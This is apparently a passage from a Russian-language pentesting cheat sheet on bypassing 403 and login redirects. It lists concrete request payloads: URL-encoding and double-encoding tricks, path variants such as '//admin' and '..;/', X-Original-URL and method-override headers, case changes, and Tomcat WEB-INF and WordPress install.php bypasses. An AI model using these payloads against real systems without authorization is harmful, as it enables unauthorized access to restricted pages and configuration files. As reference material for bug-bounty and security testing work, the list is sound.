Так что когда делаете перебор директорий, стоит обращать внимание на коды вроде 302, 400, 401, 403, 404, если, конечно, таких страничек не большинство.
1. Пробовать добавлять спец символы, например:
/file/image.png%23
Или %3f // ?, %26 // &, %2e // ., %2f // / (слеш), %40 // @. Так же пробовать двойной, тройной URL-encode, # = %23 = %2523 = %2525232.
/path/to/secret 302 на логин/public/path/to/secret 200 /foo 403 / 404/foo/bar 2003.
/admin 403//admin 200/%2fadmin 2004.
GET /account/secret 302 GET /account/secret.json 2005.
/admin/secret/ 403/admin/public/ 200/admin/public/;secret/ 200, доступ к secret6.
/page 403/page/ 200/page/%20 200/page.ext 200 (ext = php, html, json, и другие, перебирать)/page/?param 2007.
GET /admin 403GET /page200
X-Original-URL: /admin
или
X-Rewrite-URL: /admin
8. GET /admin 403ANYTHING /admin 200, перебор других методов, вроде PUT, DELETE, ...Пробовать комбинировать с заголовком
X-HTTP-Method-Override: ANYTHING
9. Редко, но тоже бывает если кривой конфиг:/index.html 403/index.html/ 20010.
/admin 403/aDmiN 200/aDmiN/ 200/ADMIN 20011. Java, Tomcat, j2ee:
/page.jsp?include=..;/..;/secret.txt /WEB-INF/web.xml 403/./WEB-INF/web.xml 403/.//WEB-INF/web.xml 200/admin/ 302/admin..;/ 20012.
/wp-admin/install.php 403/wp-admin/install.php/* 200Частично на основе:
https://samcurry.net/hacking-starbucks/
https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.g722ec9d5aa_0_0